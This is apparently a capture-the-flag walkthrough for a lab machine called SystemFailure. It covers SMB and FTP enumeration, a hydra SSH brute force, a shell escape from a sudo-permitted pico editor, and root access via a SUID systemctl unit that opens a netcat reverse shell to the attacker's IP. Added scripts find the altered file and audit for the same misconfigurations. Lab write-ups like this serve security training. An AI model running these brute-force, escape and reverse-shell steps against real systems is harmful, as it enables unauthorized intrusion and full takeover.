# Nmap 7.91 scan initiated Thu Mar 11 21:49:07 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.80
Nmap scan report for 192.168.56.80
Host is up (0.014s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 bb:02:d1:ee:91:11:fe:a0:b7:90:e6:e0:07:49:95:85 (RSA)
|   256 ef:e6:04:30:01:50:07:5d:2d:17:99:d1:00:3d:f2:d6 (ECDSA)
|_  256 80:7f:c5:96:0e:3d:66:b9:d6:a8:6f:59:fa:ca:86:36 (ED25519)
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: SYSTEMFAILURE; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Enumerate SMB, download the file "share", and check its content.
┌──(kali㉿mykali)-[~]
└─$ smbclient -L 192.168.56.80
Enter WORKGROUP\kali's password:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      open
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available

┌──(kali㉿mykali)-[~]
└─$ smbclient //192.168.56.80/anonymous
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Dec 18 05:25:14 2020
  ..                                  D        0  Wed Dec 16 22:58:53 2020
  share                               N      220  Fri Dec 18 05:25:14 2020

                7205476 blocks of size 1024. 5406288 blocks available
smb: \> get share
getting file \share of size 220 as share (9.8 KiloBytes/sec) (average 9.8 KiloBytes/sec)
smb: \> quit

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ cat share
Guys, I left you access only here to give you my shared file, you have little time, I leave you the login credentials inside for FTP you will find some info, you have to hurry!
89492D216D0A212F8ED54FC5AC9D340B
Admin
Also, through SMB, we can get 4 user names.
┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ enum4linux -a 192.168.56.80
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 12 22:35:43 2021
...
 ========================================================================
|    Users on 192.168.56.80 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-992311547-1957423116-3284270811
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\valex (Local User)
S-1-22-1-1001 Unix User\admin (Local User)
S-1-22-1-1002 Unix User\jin (Local User)
S-1-22-1-1003 Unix User\superadmin (Local User)
...
Crack the hash from the share file to recover the password.
Log in to FTP as "admin" with that password and download here.txt.
┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ ftp 192.168.56.80                                                    130 ⨯
Connected to 192.168.56.80.
220 (vsFTPd 3.0.3)
Name (192.168.56.80:kali): admin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Dec 16 12:45 Interesting
drwxr-xr-x    2 0        0            4096 Dec 16 12:45 Secr3t
drwxr-xr-x    3 0        0            4096 Dec 20 05:25 Syst3m
drwxr-xr-x    2 0        0            4096 Dec 16 12:45 Useful
ftp> cd Syst3m
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Dec 20 05:25 .
drwxr-xr-x    8 1001     1001         4096 Dec 24 10:33 ..
drwxr-xr-x    2 0        0           36864 Dec 20 05:30 F4iluR3
-rw-r--r--    1 0        0              89 Dec 20 05:17 here.txt
226 Directory send OK.

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ cat here.txt
(I l3f7 y0u 0ur s3cr3t c0d3)+(I l3f7 17 ju57 f0r y0u)+(t0 m4k3)x(7h1ng5 s4f3r.)
-Admin
The F4iluR3 folder contains about 1000 files. Turn off interactive mode and download them all.
ftp> prompt off
Interactive mode off.
ftp> mget *
local: file.txt remote: file.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for file.txt (1696 bytes).
226 Transfer complete.
1696 bytes received in 0.00 secs (5.1841 MB/s)
local: file0001.txt remote: file0001.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for file0001.txt (1696 bytes).
226 Transfer complete.
...
List all the files sorted by size; only one file differs from the others. Check its content and find a strange string.
┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ ls -laSr
...
-rw-r--r-- 1 kali kali  1696 Mar 12 22:44 file0002.txt
-rw-r--r-- 1 kali kali  1696 Mar 12 22:44 file0001.txt
-rw-r--r-- 1 kali kali  1714 Mar 12 22:46 file0189.txt
drwxr-xr-x 6 kali kali 32768 Mar 12 22:46 ..
drwxr-xr-x 2 kali kali 32768 Mar 12 22:46 .

┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ cat file0189.txt
Systems Failure is a role-playing game written by Bill Coffin and published by Palladium Books in July 1999.The fictional premise for the game is that during the "Millennium bug" scare, actual "Bugs" appeared. They are energy beings from beyond Earth (whether another dimension or another planet is not clear) that invaded at the end of 1999, leaving a post-apocalyptic world in their wake. The Bugs feed on energy and are capable of transmitting themselves through modern power transmission and phone lines.The Bugs come in several varieties. There are the drone-like Army Ants who have only basic intelligence, the more intelligent Assassin Bugs who can replicate human speech, though imperfectly, and the flying Lightning Bugs, amongst others. All of them are able to turn themselves into energy or rapidly call up reinforcements. In addition to these, there are "brain bugs", a variety that can invade human minds and turn them into zombie-like servants of the Bugs.Players take the part of survivors of this invasion ten years after it occurred. Some groups, such as survival-oriented militias, were well-prepared for something to go wrong and so form the nuclei of stable societies and resistance to the Bugs. Military units have converged on NORAD which is using genetic engineering to create new weapons that the Bugs cannot gain control of, and to create super-soldiers-J310MIYla1aVUaSV-, both those that have psionic powers and those who have been mutated into insect-like supermen using Bug DNA.
In addition, there are people who have been driven mad by the stress, those who have joined gangs and seek to exploit others, and those who trade their skills as mechanics, medics, scientists, or merchants.
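Sorting by size only works because the inserted string changed the file length. As an added example (not part of the original write-up), the functions below group files by content hash instead, so a same-size modification is also caught, and then print the words that appear only in the odd file. The function names and the demo data are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: isolate the one file that differs in a directory of
# near-identical files, then show which words were inserted into it.

# odd_files DIR: print files whose SHA-256 occurs exactly once in DIR.
odd_files() {
  sha256sum "$1"/* | awk '
    { h = $1; n[h]++; f[h] = substr($0, 67) }   # 64 hex chars + 2 separators
    END { for (h in n) if (n[h] == 1) print f[h] }' | sort
}

# common_file DIR: print one file carrying the most frequent hash (the template).
common_file() {
  sha256sum "$1"/* | awk '
    { h = $1; n[h]++; f[h] = substr($0, 67) }
    END { for (h in n) if (n[h] > best) { best = n[h]; pick = f[h] }; print pick }'
}

# extra_words ODD REF: print whitespace-separated words present only in ODD.
extra_words() {
  tmp=$(mktemp -d)
  tr -s '[:space:]' '\n' < "$1" | sort -u > "$tmp/odd"
  tr -s '[:space:]' '\n' < "$2" | sort -u > "$tmp/ref"
  comm -23 "$tmp/odd" "$tmp/ref"
  rm -rf "$tmp"
}

# Constructed demo data: 4 identical files and one with a token spliced in.
demo_dir() {
  d=$(mktemp -d)
  for i in 1 2 3 4; do echo "create super-soldiers, both kinds" > "$d/file000$i.txt"; done
  echo "create super-soldiers-EXAMPLETOKEN-, both kinds" > "$d/file0005.txt"
  echo "$d"
}

d=$(demo_dir)
odd=$(odd_files "$d")
echo "odd file: $odd"
extra_words "$odd" "$(common_file "$d")"
rm -rf "$d"
```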
Decode the string with base62.
Check http://192.168.56.80/area4/Sup3rS3cR37/System/ and get two files. useful.txt seems to be a dictionary.
┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ curl http://192.168.56.80/area4/Sup3rS3cR37/System/note.txt
Guys, I left something here for you, I know your skills well, we must try to hurry. Not always everything goes the right way.
-Admin

┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ curl http://192.168.56.80/area4/Sup3rS3cR37/System/useful.txt
andres
courtney
booboo
kissme
harley
ronaldo
...
Brute force SSH with the names enumerated from SMB and the dictionary. Pay attention to the hint in note.txt: the "right" way. So we need to set "-e r" in hydra.
┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ hydra -L names.txt -P useful.txt -e nsr 192.168.56.80 ssh -t 32
...
[DATA] attacking ssh://192.168.56.80:22/
[STATUS] 283.00 tries/min, 283 tries in 00:01h, 782 to do in 00:03h, 32 active
[ssh] host: 192.168.56.80   login: valex   password: ...
1 of 1 target successfully completed, 1 valid password found
Log in over SSH as valex and check sudo.
valex@SystemFailure:~$ sudo -l
sudo: unable to resolve host SystemFailure: Temporary failure in name resolution
Matching Defaults entries for valex on SystemFailure:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User valex may run the following commands on SystemFailure:
    (jin) NOPASSWD: /usr/bin/pico
Run /usr/bin/pico; it looks like nano. We can escalate to user jin through nano.
pico
^R^X
reset; sh 1>&0 2>&0
As user jin, check for SUID files.
jin@SystemFailure:~$ find / -perm -u=s 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/umount
/usr/bin/systemctl
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
Get root through systemctl.
jin@SystemFailure:~$ echo '[Service]
> Type=oneshot
> ExecStart=nc 192.168.56.150 2234 -e /bin/bash
> [Install]
> WantedBy=multi-user.target' > $TF
jin@SystemFailure:~$ /usr/bin/systemctl link $TF
Created symlink /etc/systemd/system/tmp.noEJj88ESX.service → /tmp/tmp.noEJj88ESX.service.
jin@SystemFailure:~$ /usr/bin/systemctl enable --now $TF
Created symlink /etc/systemd/system/multi-user.target.wants/tmp.noEJj88ESX.service → /tmp/tmp.noEJj88ESX.service.
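Both escalation steps above (the NOPASSWD rule for pico and the SUID bit on systemctl) are misconfigurations that a host audit can catch. The following is an added example, not part of the original write-up, that flags them from `find` and `sudo -l` output; the RISKY list and the SUID baseline are assumptions to be replaced with your own standard.

```shell
#!/usr/bin/env bash
# Added audit example, not part of the original write-up.
# Programs able to spawn a shell or run arbitrary commands. Constructed,
# non-exhaustive list (assumption); extend it from your hardening standard.
RISKY='systemctl|pico|nano|vim?|less|more|find|env|bash|sh|perl|python[0-9.]*'

# Assumed SUID baseline: every path from the listing above except systemctl.
# Replace with the baseline of your own image.
BASELINE='/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn'

is_risky() { printf '%s\n' "${1##*/}" | grep -qxE "($RISKY)"; }

# Reads SUID paths on stdin; prints a finding for each path outside BASELINE.
audit_suid() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    if printf '%s\n' "$BASELINE" | grep -qxF -- "$path"; then continue; fi
    if is_risky "$path"; then echo "CRITICAL suid $path"
    else echo "REVIEW suid $path"; fi
  done
}

# Reads `sudo -l` output on stdin; prints NOPASSWD rules whose command is risky.
audit_sudo() {
  sed -nE 's/^[[:space:]]*\(([^)]*)\)[[:space:]]*NOPASSWD:[[:space:]]*([^ ,]+).*/\2 \1/p' |
  while read -r cmd runas; do
    if is_risky "$cmd"; then echo "CRITICAL sudo $cmd as $runas without password"; fi
  done
}

# Constructed demo input taken from the outputs above. Live use:
#   find / -xdev -perm -4000 -type f 2>/dev/null | audit_suid
#   sudo -l | audit_sudo
{ printf '%s\n' "$BASELINE"; echo /usr/bin/systemctl; } | audit_suid
echo '    (jin) NOPASSWD: /usr/bin/pico' | audit_sudo
```

The systemctl finding is cleared by removing the SUID bit (`chmod u-s /usr/bin/systemctl`); the pico finding by replacing the editor rule with `sudoedit` for the specific files that need editing.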
Check root flag.
listening on [any] 2234 ...
connect to [192.168.56.150] from (UNKNOWN) [192.168.56.80] 42672
cd /root
ls
root.txt
id;hostname;cat root.txt
uid=0(root) gid=0(root) groups=0(root)
SystemFailure
If you are reading this flag, without being rooted, it is not valid. You must enter after send me a picture you entered jin, and tag me. Good luck.